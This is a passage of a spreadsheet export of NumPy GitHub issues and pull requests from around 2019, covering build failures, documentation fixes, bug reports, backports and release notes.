    Generating build/src.linux-x86_64-3.8/numpy/core/include/numpy/config.h_x000D_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success!_x000D_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success!_x000D_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_configtest.c:1:10: fatal error: sys/endian.h: No such file or directory_x000D_
     #include &lt;sys/endian.h&gt;_x000D_
              ^~~~~~~~~~~~~~_x000D_
    compilation terminated._x000D_
    failure._x000D_
    removing: _configtest.c _configtest.o_x000D_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success!_x000D_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success!_x000D_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success!_x000D_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success!_x000D_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&gt;= 0)];_x000D_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 4)];_x000D_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&gt;= 0)];_x000D_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 8)];_x000D_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success!_x000D_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&gt;= 0)];_x000D_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 8)];_x000D_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&gt;= 0)];_x000D_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 16)];_x000D_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_configtest.c:7:12: error: ‘SIZEOF_LONGDOUBLE’ undeclared (first use in this function); did you mean ‘SIZEOF_LONG_DOUBLE’?_x000D_
         (void) SIZEOF_LONGDOUBLE;_x000D_
                ^~~~~~~~~~~~~~~~~_x000D_
                SIZEOF_LONG_DOUBLE_x000D_
    _configtest.c:7:12: note: each undeclared identifier is reported only once for each function it appears in_x000D_
    failure._x000D_
    removing: _configtest.c _configtest.o_x000D_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&gt;= 0)];_x000D_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 16)];_x000D_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&gt;= 0)];_x000D_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_configtest.c:5:16: warning: variable ‘test_array’ set but not used [-Wunused-but-set-variable]_x000D_
         static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) == 32)];_x000D_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function ‘main’:_x000D_
    _configtest.c:7:16: warning: variable ‘test_array’ set but not used [-Wunused-but-set-variable]_x000D_
         static int test_array [1 - 2 * !(((long) (sizeof (npy_check_sizeof_type))) &gt;= 0)];_x000D_
                    ^~~~~~~~~~_x000D_
    removing: _configtest.c _configtest.o _configtest.o.d_x000D_
    C compiler: gcc -pthread -Wno-unused-result -Wsign-compare -DNDEBUG -g -fwrapv -O3 -Wall -fPIC_x000D_
    _x000D_
    compile options: '-Inumpy/core/src/common -Inumpy/core/src -Inumpy/core -Inumpy/core/src/npymath -Inumpy/core/src/multiarray -Inumpy/core/src/umath -Inumpy/core/src/npysort -I/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/include -I/home/juanlu/.pyenv/versions/3.8.0b4/include/python3.8 -c'_x000D_
    gcc: _configtest.c_x000D_
    _configtest.c: In f</t>
  </si>
  <si>
    <t xml:space="preserve">Error trying to install in CPython 3.8.0b4 </t>
  </si>
  <si>
    <t>['32 - Installation']</t>
  </si>
  <si>
    <t>Issue gh-2880 has been open since 2013.  In a recent community meeting, it was suggested that we create a NEP to propose the removal of the financial functions from NumPy.  This is the initial draft of that NEP.</t>
  </si>
  <si>
    <t>NEP 32: Remove the financial functions from NumPy</t>
  </si>
  <si>
    <t>Closes gh-14386.</t>
  </si>
  <si>
    <t>DOC: fix issue with __new__ usage in subclassing doc.</t>
  </si>
  <si>
    <t>Fixes #14344_x000D_
_x000D_
Minor bugfix caused by treating the "dtype([])" structured type as if it was the "V0" flexible type.</t>
  </si>
  <si>
    <t>BUG: view with fieldless dtype should raise if itemsize != 0</t>
  </si>
  <si>
    <t>Fixes #14391_x000D_
_x000D_
This just updates the docstring to clarify how this function is inexact for some floating-point values._x000D_
_x000D_
_x000D_
(An alternative might be to try to "fix" the np.around algorithm, either by using the BigInt algorithm of the float-printing routines, some simplified bigger-int method, and perhaps also special casing the range of values that are problematic. It's hard to tell how much faster the current algorithm is to a BigInt algorithm, because I find it hard to separate the vectorization speedups in numpy from the round optimizations vs plain python).</t>
  </si>
  <si>
    <t>DOC: update np.around docstring with note about floating-point error</t>
  </si>
  <si>
    <t>It turns out there is both `doc/HOWTO_RELEASE.rst.txt` and doc/RELEASE_WALKTHROUGH.rst.txt. #14073 only updated the former where it seems the latter is the one actually in use. Both of them are rendered in https://numpy.org/doc/1.17/dev/releasing.html  (`doc/source/releasing.rst`)_x000D_
_x000D_
#14388 points out that the current `make dist` will create a generic `numpy-html.zip`, `numpy-ref.pdf` and `numpy-user.pdf`. We should rename those uniquely for each release, which it seems was done manually for the scipy.org documentation uploads.</t>
  </si>
  <si>
    <t>DOC: document numpy/doc update process</t>
  </si>
  <si>
    <t>This PR adds the initial draft version of NEP-31. Posted to the mailing list: https://mail.python.org/pipermail/numpy-discussion/2019-August/079952.html</t>
  </si>
  <si>
    <t>NEP: Add initial draft of NEP-31: Context-local and global overrides of the NumPy API</t>
  </si>
  <si>
    <t>&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
There seems to be a minor bug in the example code for subclassing ndarray [in this section of the online documentation](https://docs.scipy.org/doc/numpy/user/basics.subclassing.html#a-brief-python-primer-on-new-and-init)_x000D_
_x000D_
The example for class C includes a call to `object.__new__()` with more than one argument:_x000D_
_x000D_
```python_x000D_
class C(object):_x000D_
    def __new__(cls, *args):_x000D_
        print('Cls in __new__:', cls)_x000D_
        print('Args in __new__:', args)_x000D_
        return object.__new__(cls, *args)_x000D_
```_x000D_
_x000D_
Calling this results in an error:_x000D_
_x000D_
```_x000D_
  File "/home/jon/python/ndarray_testing.py", line 31, in __new___x000D_
    return object.__new__(cls, *args)_x000D_
_x000D_
TypeError: object.__new__() takes exactly one argument (the type to instantiate)_x000D_
```_x000D_
_x000D_
If the extra argument to `object.__new__()` is removed, the example works as expected._x000D_
_x000D_
### Fixed example:_x000D_
_x000D_
```python_x000D_
class C(object):_x000D_
    def __new__(cls, *args):_x000D_
        print('Cls in __new__:', cls)_x000D_
        print('Args in __new__:', args)_x000D_
        return object.__new__(cls)_x000D_
_x000D_
    def __init__(self, *args):_x000D_
        print('type(self) in __init__:', type(self))_x000D_
        print('Args in __init__:', args)_x000D_
```_x000D_
_x000D_
### Output of fixed example_x000D_
```_x000D_
In [129]: C('foo')_x000D_
Cls in __new__: &lt;class '__main__.C'&gt;_x000D_
Args in __new__: ('foo',)_x000D_
type(self) in __init__: &lt;class '__main__.C'&gt;_x000D_
Args in __init__: ('foo',)_x000D_
Out[129]: &lt;__main__.C at 0x7f27fb972710&gt;_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
1.16.2 3.7.3 (default, Mar 27 2019, 22:11:17) _x000D_
[GCC 7.3.0]</t>
  </si>
  <si>
    <t>bug in documentation example code for subclassing ndarray</t>
  </si>
  <si>
    <t xml:space="preserve">- Forwardport 1.16.5-changelog.rst_x000D_
- Forwardport 1.16.5-notes.rst_x000D_
- Update release.rst_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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REL: Update master after NumPy 1.16.5 release.</t>
  </si>
  <si>
    <t xml:space="preserve">- Update .mailmap_x000D_
- Create 1.16.5-changelog.rst_x000D_
- Update 1.16.5-notes.rst._x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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REL: Prepare for the NumPy 1.16.5 release.</t>
  </si>
  <si>
    <t xml:space="preserve">An input such as_x000D_
_x000D_
    np.histogram(np.array([-2, 0, 127], dtype=np.int8), bins="auto")_x000D_
_x000D_
would raise the exception_x000D_
_x000D_
    ValueError: Number of samples, -1, must be non-negative._x000D_
_x000D_
The problem was that the peak-to-peak value for the input array was_x000D_
computed with the `ptp` method, which returned negative values for_x000D_
signed integer arrays when the actual value was more than the_x000D_
maximum signed value of the array's data type._x000D_
 _x000D_
The fix is to use a peak-to-peak function that returns an_x000D_
unsigned value for signed integer arrays._x000D_
_x000D_
Closes gh-14379._x000D_
</t>
  </si>
  <si>
    <t>BUG: lib: Fix histogram problem with signed integer arrays.</t>
  </si>
  <si>
    <t>['00 - Bug', '09 - Backport-Candidate', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
Getting `Number of samples, -20, must be non-negative.` when trying to build a histogram of my dataset._x000D_
_x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
my_data = np.loadtxt("my_data.csv", delimiter=',', dtype=np.int16)_x000D_
_x000D_
n_base, bins_base = np.histogram(my_data, bins="auto")_x000D_
_x000D_
```_x000D_
_x000D_
Here is [my_data.csv](https://drive.google.com/file/d/19h8hwDpipr3lg1zA0YAQAB4LF7_lpyXc/view?usp=sharing)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Number of samples, -20, must be non-negative._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
&lt;!-- Full error message, if any (starting from line Traceback: ...) --&gt;_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
1.16.4 3.7.4 (default, Aug 13 2019, 20:35:49) _x000D_
[GCC 7.3.0]_x000D_
</t>
  </si>
  <si>
    <t>Histgram number of samples is negative with bins="auto"</t>
  </si>
  <si>
    <t>Move all the test dependencies to a single `test_requirements.txt`. Perhaps we should have a  `build_requirements.txt` with only cython?_x000D_
_x000D_
The real goal is to enable testing whether these packages have updates, so I added use of `pip list -o` to list outdated packages._x000D_
_x000D_
Probably `pip install -r test_requirements.txt` should get a shoutout somewhere in the development documentation</t>
  </si>
  <si>
    <t>BUILD: move all test dependencies to ./test_requirements.txt</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: build']</t>
  </si>
  <si>
    <t xml:space="preserve">I've got an inconsistent error message when assigning float infinite value to an integer array using different size of slice. OverflowError occurs only when assigning point value. I think that it can be better if it gives an error in both cases._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
a = np.array([1, 2, 3, 4, 5])_x000D_
_x000D_
# (Case 1) OverflowError: cannot convert float infinity to integer_x000D_
a[1:2] = np.inf_x000D_
_x000D_
# (Case 2) No error_x000D_
a[1:3] = np.inf_x000D_
# [                   1 -9223372036854775808 -9223372036854775808_x000D_
#                     4                    5]_x000D_
```_x000D_
_x000D_
### Error message:_x000D_
_x000D_
Error message from 'Case 1':_x000D_
_x000D_
```_x000D_
Traceback (most recent call last):_x000D_
  File "main.py", line 102, in &lt;module&gt;_x000D_
    main()_x000D_
  File "main.py", line 92, in main_x000D_
    a[1:2] = np.inf_x000D_
OverflowError: cannot convert float infinity to integer_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
NumPy: 1.16.4_x000D_
Python: 3.6.9_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Inconsistent invocation of OverflowError when assigning float infinity to integer array.</t>
  </si>
  <si>
    <t xml:space="preserve">- Update .mailmap_x000D_
- Create 1.17.1-changelog.rst_x000D_
- Create 1.17.1-notes.rst_x000D_
- Add notes to release.rst_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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Post NumPy 1.17.1 update.</t>
  </si>
  <si>
    <t>Fixes #9308</t>
  </si>
  <si>
    <t>MAINT: Avoid BytesWarning in PyArray_DescrConverter()</t>
  </si>
  <si>
    <t>Also removed the incorrect comment from the docstring of `numpy.ma.average`_x000D_
about the imaginary part of `weights` being ignored.</t>
  </si>
  <si>
    <t>DOC: lib: Add more explanation of the weighted average calculation.</t>
  </si>
  <si>
    <t xml:space="preserve">We don't yet know if 3.10 or 4.0 will follow Python 3.9, but whichever it is, it will probably happen in [2020 (when Python 3.9 reaches beta)](https://www.python.org/dev/peps/pep-0596/#schedule)._x000D_
_x000D_
There's some places in the codebase that slice the `sys.version` string, assuming the string is 3 characters long. This sort of thing will break on Python 3.10:_x000D_
_x000D_
```python_x000D_
# in python3.10 this will report as '3.1' (should be '3.10')_x000D_
python_version = sys.version[0:3]_x000D_
_x000D_
# correct way to do this_x000D_
python_version = '{}.{}'.format(*sys.version_info)_x000D_
```_x000D_
_x000D_
And also some places that would run Python 2 code on Python 4, such as:_x000D_
_x000D_
```python_x000D_
# in python4 this will report as `False` (and suddenly run python2 code!)_x000D_
is_py3 = sys.version_info[0] == 3_x000D_
_x000D_
# correct way to do this_x000D_
is_py3 = sys.version_info[0] &gt;= 3_x000D_
```_x000D_
_x000D_
Found using https://github.com/asottile/flake8-2020:_x000D_
```console_x000D_
$ pip install -U flake8-2020_x000D_
..._x000D_
$ flake8 --select YTT_x000D_
./tools/swig/test/testFarray.py:18:41: YTT101: `sys.version[:...]` referenced (python3.10), use `sys.version_info`_x000D_
./tools/npy_tempita/compat3.py:8:15: YTT201: `sys.version_info[0] == 3` referenced (python4), use `&gt;=`_x000D_
./numpy/distutils/command/build.py:41:54: YTT101: `sys.version[:...]` referenced (python3.10), use `sys.version_info`_x000D_
./numpy/distutils/command/build_src.py:93:58: YTT101: `sys.version[:...]` referenced (python3.10), use `sys.version_info`_x000D_
./numpy/core/setup.py:467:16: YTT201: `sys.version_info[0] == 3` referenced (python4), use `&gt;=`_x000D_
./numpy/testing/_private/parameterized.py:48:7: YTT201: `sys.version_info[0] == 3` referenced (python4), use `&gt;=`_x000D_
```_x000D_
</t>
  </si>
  <si>
    <t>MAINT: Fixes for prospective Python 3.10 and 4.0</t>
  </si>
  <si>
    <t>Closes https://github.com/numpy/numpy/issues/14285_x000D_
_x000D_
There are a few things happening here, but I have the docs building for `sphinx &gt;= 2.1`. The minimum version is due to a planned deprecation in `3.x` that wasn't supported until `2.1` - this portion can be dropped but there's enough differences between `1.8` and `2.0` that I'm not sure it buys us much._x000D_
_x000D_
The changes are:_x000D_
- `sphinx.highlighting.lexers` is no longer populated, so we can't pull a `CLexer` instance out of it_x000D_
  - But we're inheriting from `CLexer` already, so just use that_x000D_
- There's a supported method for adding custom lexers via `.set_lexer()`_x000D_
  - This will only accept classes starting in `3.x`, but support for classes was only added in `2.1`_x000D_
  - The use of `partial()` matches how sphinx does it internally: https://github.com/sphinx-doc/sphinx/blob/master/sphinx/highlighting.py#L40_x000D_
- The `master_doc` parameter is now defaults to `index` when the pre-`2.0` default was `contents`._x000D_
  - Explicitly set old default_x000D_
- Latex recently enabled UTF-8 support and Sphinx makes a number of changes to support that_x000D_
  - The unicode support is a bit weird, as it translates every code point into a macro. This blows up memory consumption, so latex (at least under some engines) detects what fonts are being used and then loads the relevant macros._x000D_
  - This means characters like `γ` (lowercase gamma) now cause latex builds to fail if both of these are false:_x000D_
    - `\DeclareUnicodeCharacter` is not set for each UTF-8 code point in use or..._x000D_
    - The font encoding (Greek = `LGR`) is not declared as part of this command:_x000D_
        - `r'\usepackage[LGR,T1]{fontenc}'`_x000D_
   - So if someone in the future wants to use Hebrew, Cyrillic, etc. then they need to do one of the two steps above._x000D_
_x000D_
I've visually inspected the html and pdf output and it looks good to me. One thing I should note is that the `sphinx` defaults are different for each `latex_engine` setting. It has been defaulting to `pdflatex` for me, but that may not match what is being used for release documentation. It may make sense to configure `latex_engine` explicitly if we see significant variations._x000D_
_x000D_
Edit: given the desire to pin sphinx, I've bumped the pinned version to the newest release (`2.2.0`)</t>
  </si>
  <si>
    <t>DOC: support and require sphinx&gt;=2.2</t>
  </si>
  <si>
    <t xml:space="preserve">Update `np._pytesttester.PytestTester` docstring based on feedback in https://github.com/numpy/numpy/issues/14354_x000D_
</t>
  </si>
  <si>
    <t>DOC: clarify that PytestTester is non-public</t>
  </si>
  <si>
    <t xml:space="preserve">I'm working on replacing `nose` with `pytest` in a downstream dependency that currently exposes a `numpy.test()`-style interface. I was trying to decide if I should deprecate that or switch to `PytestTester` and the `numpy` docs are a bit unclear._x000D_
_x000D_
The `PytestTester` docstring states (https://github.com/numpy/numpy/blob/master/numpy/_pytesttester.py#L51):_x000D_
```_x000D_
    This class is made available in ``numpy.testing``, and a test function_x000D_
    is typically added to a package's __init__.py like so::_x000D_
```_x000D_
However, it is explicitly not exported within `numpy/testing/__init__.py`: https://github.com/numpy/numpy/blob/master/numpy/testing/__init__.py#L22_x000D_
_x000D_
Is `PytestTester` part of the public API?_x000D_
_x000D_
Docstring suggests so, but only being available via `numpy._pytesttester` suggests that it is private._x000D_
_x000D_
Worth mentioning that `scipy.test()` used to leverage `numpy.testing.Tester()`. Now, it uses its own implementation (`scipy._libs._testutils.PytestTester`)_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>PytestTester is not available via np.testing despite docstring claiming so</t>
  </si>
  <si>
    <t>['component: numpy.testing']</t>
  </si>
  <si>
    <t>~~First commit is gh-14352, which this refactor depends on. Marking as WIP until that is merged.~~</t>
  </si>
  <si>
    <t xml:space="preserve"> MAINT: polynomial: Add an N-d vander implementation used under the hood of the vander2d and vander3d functions</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: numpy.polynomial']</t>
  </si>
  <si>
    <t xml:space="preserve">These deprecations already happen inside `vanderf`, so don't need to be repeated here._x000D_
</t>
  </si>
  <si>
    <t>MAINT: Remove redundant deprecation checks</t>
  </si>
  <si>
    <t xml:space="preserve">- Create 1.17.1-changelog.rst_x000D_
- Update 1.17.1-notes.rst_x000D_
- Update .mailmap_x000D_
_x000D_
[skip ci]_x000D_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</si>
  <si>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REL: Prepare 1.17.1 release</t>
  </si>
  <si>
    <t>&lt;!--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Fixes [#13834]_x000D_
_x000D_
Also related to [#14323], part of which was closed via [#14326]</t>
  </si>
  <si>
    <t xml:space="preserve">MAINT: Fix bloated mismatch error percentage in array comparisons. </t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14310. _x000D_
_x000D_
This fixes up some weird behavior of structured_to_unstructured discovered in #13333._x000D_
_x000D_
Performance may not be so great for dtypes with a very large subarray of structured type, but that seems like a poor situation anyway._x000D_
_x000D_
Fixes #13333_x000D_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</si>
  <si>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behavior of structured_to_unstructured on non-trivial dtypes</t>
  </si>
  <si>
    <t>Following the discussion on this [twitter thread](https://twitter.com/raamana_/status/1162746638605176832?s=20), this PR tries to improve the docs for `np.isscalar()`_x000D_
_x000D_
Please edit as you feel is ideal for this merge._x000D_
_x000D_
PS: tried to add the word DOC to the commit messages, it wasn't working in my IDE for some reason.</t>
  </si>
  <si>
    <t>DOC: Improve documentation of `isscalar`.</t>
  </si>
  <si>
    <t>Reverts gh-13913 since it has false-positives in detection of ragged arrays (for instance `np.array([1, np.array([5])], dtype=int)`_x000D_
_x000D_
Fixes gh-14138, reopens gh-5303 and gh-6584._x000D_
_x000D_
The correct fix is to add this corner case and make sure `discover_dimensions` does not set `is_object` when it does not need to.</t>
  </si>
  <si>
    <t>BUG: revert detecting and raising error on ragged arrays</t>
  </si>
  <si>
    <t>Backport of gh-14290. All but the merge commit are exactly the same commit._x000D_
_x000D_
Merge commit is needed to pull in the backport of gh-13964, since those did not use a single-commit approach.</t>
  </si>
  <si>
    <t>BUG: Fix misuse of .names and .fields in various places (backport 14290 to 1.16)</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.core', 'component: numpy.dtype']</t>
  </si>
  <si>
    <t>Backport of gh-14290. All but the merge commit are identical.</t>
  </si>
  <si>
    <t>BUG: Fix misuse of .names and .fields in various places (backport 14290 to 1.17)</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14240. _x000D_
_x000D_
`np.lexsort` would fail on empty arrays with non-standard strides as a result of the changes in #13691. While fixing this I tried to also solve a couple of other problems/leaks that could be triggered in low-memory situations._x000D_
_x000D_
Fixes #14228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</si>
  <si>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don't fail when lexsorting some empty arrays (#14228)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
 The `shippable` checks for PRs seems to be failing._x000D_
_x000D_
 The error message is _x000D_
```_x000D_
sudo docker run -d --privileged --name shippable-dind docker:17.09.1-dind 0s  _x000D_
docker: Error response from daemon: Conflict. The container name "/shippable-dind" is already in use by container "8d42ce9836972a4991a7abe7dbc2425b909985818952c257d933003ec2958e75". You have to remove (or rename) that container to be able to reuse that name._x000D_
See 'docker run --help'._x000D_
```_x000D_
_x000D_
see [#14335] for details. </t>
  </si>
  <si>
    <t>Shippable checks failing</t>
  </si>
  <si>
    <t>['component: CI']</t>
  </si>
  <si>
    <t xml:space="preserve">The `SafeEval` class has been deprecated since 1.10._x000D_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t>
  </si>
  <si>
    <t>DEP: Deprecate class `SafeEval`</t>
  </si>
  <si>
    <t>['07 - Deprecation', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14241. 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Reference  [ #14238](https://github.com/numpy/numpy/issues/14238)_x000D_
_x000D_
I made the assumption that anyone who passes a string  `x` to the function `np.random.permutation(x)` most likely intend to shuffle the string in question. I suggest that if this isn't the desired behaviour, then I can flag an error instead of the segfault. _x000D_
_x000D_
* fixing segfault error in np.random.permutation(x) where x is str_x000D_
_x000D_
* removed whitespace_x000D_
_x000D_
* changing error type to ValueError_x000D_
_x000D_
* changing error type to ValueError_x000D_
_x000D_
* changing error type to ValueError_x000D_
_x000D_
* tests_x000D_
_x000D_
* changed error to IndexError for backward compatibility with numpy 1.16_x000D_
_x000D_
* fixes numpy.randomstate.permutation segfault too_x000D_
_x000D_
* Rolled back to ValueError for Generator.permutation() for all 0-dimensional_x000D_
_x000D_
* fixes refuige erro and rolls backs to AxisError_x000D_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</si>
  <si>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 xml:space="preserve">BUG: Fix segfault in `random.permutation(x)` when  x is a string. </t>
  </si>
  <si>
    <t>No explanation of the arguments for `np.timedelta64` in the documentation._x000D_
_x000D_
### Reproducing example:_x000D_
_x000D_
1. Goto the [np.timedelta64 documentation](https://docs.scipy.org/doc/numpy/reference/arrays.datetime.html)_x000D_
_x000D_
2. Read the documentation and see references to things like `np.timedelta64(1,'D')`_x000D_
_x000D_
3. Try to figure out what the `1` and `D` specifically refer to without inferring_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
```python_x000D_
&gt;&gt;&gt; import sys, numpy; print(numpy.__version__, sys.version)_x000D_
1.17.0 3.6.8 (tags/v3.6.8:3c6b436a57, Dec 24 2018, 00:16:47) [MSC v.1916 64 bit (AMD64)]_x000D_
```_x000D_
_x000D_
Documentation as of July 26, 2019: https://web.archive.org/save/https://docs.scipy.org/doc/numpy/reference/arrays.datetime.html?highlight=timedelta64_x000D_
_x000D_
### Suggested fix_x000D_
_x000D_
At the very top, in first paragraph section titled "Datetimes and Timedeltas", include a signature like_x000D_
_x000D_
```_x000D_
dtype np.timedelta(&lt;increment&gt;, &lt;unit&gt;)_x000D_
&lt;increment&gt;: number of units_x000D_
&lt;unit&gt;: time unit, such as (D)ay, (M)onth, (Y)ear.  See Datetime Units._x000D_
```</t>
  </si>
  <si>
    <t>DOC: Missing signature for `np.timedelta64`</t>
  </si>
  <si>
    <t>&lt;!--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Included in `numpy 1.11.0` release notes under [`future changes`](https://docs.scipy.org/doc/numpy-1.11.0/release.html#future-changes)</t>
  </si>
  <si>
    <t>DEP: numpy.testing.rand</t>
  </si>
  <si>
    <t xml:space="preserve">This PR modifies memory allocation in such a way that huge pages for large arrays is enabled in all Linux builds (even if `MADV_HUGEPAGE` is not defined). As per discussion in #14177, this isn't the case currently, which means huge pages may never be available depending on the NumPy build, even if the runtime system supports it. Both conda-forge and pip builds for 1.17.0 seem to not include support for huge pages._x000D_
_x000D_
The `madvise()`  [man-pages](http://man7.org/linux/man-pages/man2/madvise.2.html) indicates that it will return `EINVAL` if the `advice` is invalid. At runtime, that means that it will be enabled if available, otherwise for the use case in NumPy it's enough to simply ignore the error to fallback to default behavior._x000D_
_x000D_
Fixes #14177 ._x000D_
_x000D_
cc @hmaarrfk @jakirkham @charris @seberg @mrocklin </t>
  </si>
  <si>
    <t>ENH: Enable huge pages in all Linux builds</t>
  </si>
  <si>
    <t xml:space="preserve">* for those cases where our CI uses an OpenBLAS backend_x000D_
for testing it has now been updated to use `v0.3.7` stable release_x000D_
instead of a commit hash on the development branch preceding that_x000D_
release_x000D_
_x000D_
* the pre-built OpenBLAS binaries are pulled in from either the_x000D_
MacPython ecosystem (most architectures) or from a custom build_x000D_
script for ARMv8 and ppc64le architectures used on gcc compile farm machines_x000D_
(documented in `openblas_support` module)_x000D_
_x000D_
Note that `OPENBLAS_LONG` and `OPENBLAS_V` converge when using stable releases._x000D_
</t>
  </si>
  <si>
    <t>TST, MAINT: bump to OpenBLAS 0.3.7 stable</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', 'component: CI']</t>
  </si>
  <si>
    <t>&lt;!--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Related to [#14312](https://github.com/numpy/numpy/issues/14312)</t>
  </si>
  <si>
    <t>DOC: Clarify rules about broadcasting when empty arrays are involved.</t>
  </si>
  <si>
    <t>DOC: add two commas, move one word</t>
  </si>
  <si>
    <t>Fixes #13333_x000D_
_x000D_
This fixes up some weird behavior of `structured_to_unstructured` discovered in #13333._x000D_
_x000D_
Performance may not be so great for dtypes with a very large subarray of structured type, but that seems like a poor situation anyway.</t>
  </si>
  <si>
    <t>Bug: Fix behavior of structured_to_unstructured on non-trivial dtypes</t>
  </si>
  <si>
    <t xml:space="preserve">BUG: fix platform detection_x000D_
Wrong platfrom detection_x000D_
_x000D_
Enviroment: _x000D_
Linux host:  Linux debian-cross 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) x86_64 GNU/Linux_x000D_
Python3 version: Python 3.7.3_x000D_
Pip3 version:  18.1_x000D_
Debian version: 10 _x000D_
Numpy cross-compile on debian 10 failed because numpy detects arm platform as amd64 and add msse2 flag._x000D_
_x000D_
For reproduce:_x000D_
Install proot and qemu_x000D_
`apt install proot qemu qemu-user`_x000D_
Download raspbian from official mirror:_x000D_
`wget https://downloads.raspberrypi.org/raspbian/images/raspbian-2019-07-12/2019-07-10-raspbian-buster.zip`_x000D_
`unzip 2019-07-10-raspbian-buster.zip`_x000D_
Mount partion:_x000D_
`fdisk -l 2019-07-10-raspbian-buster.img `_x000D_
Need these string from output_x000D_
2019-07-10-raspbian-buster.img2      540672 7380991 6840320  3.3G 83 Linux_x000D_
`mount -o loop,offset=$((512*540672))  2019-07-10-raspbian-buster.img /mnt`_x000D_
Chroot into raspbian:_x000D_
`proot -R /mnt -q qemu-arm`_x000D_
After that:_x000D_
`bash`_x000D_
`pip3 install --log=/tmp/numpy git+https://github.com/numpy/numpy.git`_x000D_
Chroot enviroment: Linux debian-cross 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5+deb10u2 (2019-08-08) armv7l GNU/Linux_x000D_
_x000D_
Also If you have not Intel like hardwate (e.g. raspberry pi)_x000D_
You can set hostname e.g. `hostname leafx86` and try to compile numpy._x000D_
Compile log in attachment:_x000D_
[numpy_failed.log](https://github.com/numpy/numpy/files/3513997/numpy_failed.log)_x000D_
_x000D_
_x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix numpy.random bug in platform detection</t>
  </si>
  <si>
    <t>['03 - Maintenance', 'component: build', 'component: numpy.random']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes this compiler warning:_x000D_
_x000D_
gcc: numpy/random/bit_generator.c_x000D_
numpy/random/bit_generator.c:4889:41: warning: comparison of integers of different signs: 'int' and 'uint32_t' (aka 'unsigned int') [-Wsign-compare]_x000D_
  __pyx_t_6 = ((__pyx_v_self-&gt;pool_size != __pyx_v_5numpy_6random_13bit_generator_DEFAULT_POOL_SIZE) != 0);_x000D_
                ~~~~~~~~~~~~~~~~~~~~~~~ ^  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~_x000D_
1 warning generated_x000D_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</si>
  <si>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random: Match type of SeedSequence.pool_size to DEFAULT_POOL_SIZE.</t>
  </si>
  <si>
    <t>This fixes a simple formatting error in an exception message in `random/common.pyx`. The message is supposed to contain the expected vs. the actually received dtype, but instead contained two times the expected dtype. This would lead to confusing error messages such as `Supplied output array has the wrong type. Expected &lt;class 'numpy.float64'&gt;, got &lt;class 'numpy.float64'&gt;`._x000D_
_x000D_
Example code to enforce the error message:_x000D_
```python_x000D_
import numpy as np_x000D_
arr = np.zeros((1,), dtype="float32")_x000D_
gen = np.random.Generator(np.random.SFC64(0))_x000D_
gen.random(size=(1,), dtype="float64", out=arr)_x000D_
```_x000D_
Output after the fix:_x000D_
```_x000D_
TypeError: Supplied output array has the wrong type. Expected &lt;class 'numpy.float64'&gt;, got float32_x000D_
```</t>
  </si>
  <si>
    <t>BUG: Fix formatting error in exception message</t>
  </si>
  <si>
    <t>The leak is fairly innocent as the created Fortran objects are referenced from the module globals and therefore are only GCed on module reload/interpreter shutdown.</t>
  </si>
  <si>
    <t>BUG: Fix leak in the f2py-generated module init and `PyMem_Del` usage</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14296 ._x000D_
_x000D_
Pytest 5.1.0 segfaults when run with python3.5-dbg._x000D_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</si>
  <si>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TST: Pin pytest version to 5.0.1.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '05 - Testing', '08 - Backport', 'component: CI']</t>
  </si>
  <si>
    <t xml:space="preserve">Pytest 5.1.0 segfaults when run with python3.5-dbg. Should be backported to 1.16.x._x000D_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</si>
  <si>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TST: Pin pytest version to 5.0.1</t>
  </si>
  <si>
    <t xml:space="preserve">To avoid the cast to floating point that can occur when the first_x000D_
argument to binary_repr is a NumPy integer, the argument is converted_x000D_
to a Python integer at the beginning of the function._x000D_
_x000D_
Closes gh-14289._x000D_
</t>
  </si>
  <si>
    <t>BUG: core: Handle large negative np.int64 args in binary_repr.</t>
  </si>
  <si>
    <t xml:space="preserve">Pytest-5.1.0 is segfaults on python3.5-dbg. Because we will be dropping 3.5 for NumPy 1.18 we might as well use a later Python version for the debug testing instead of pinning the pytest version. That way there will be no need to unpin pytest when it gets fixed._x000D_
_x000D_
EDIT:_x000D_
_x000D_
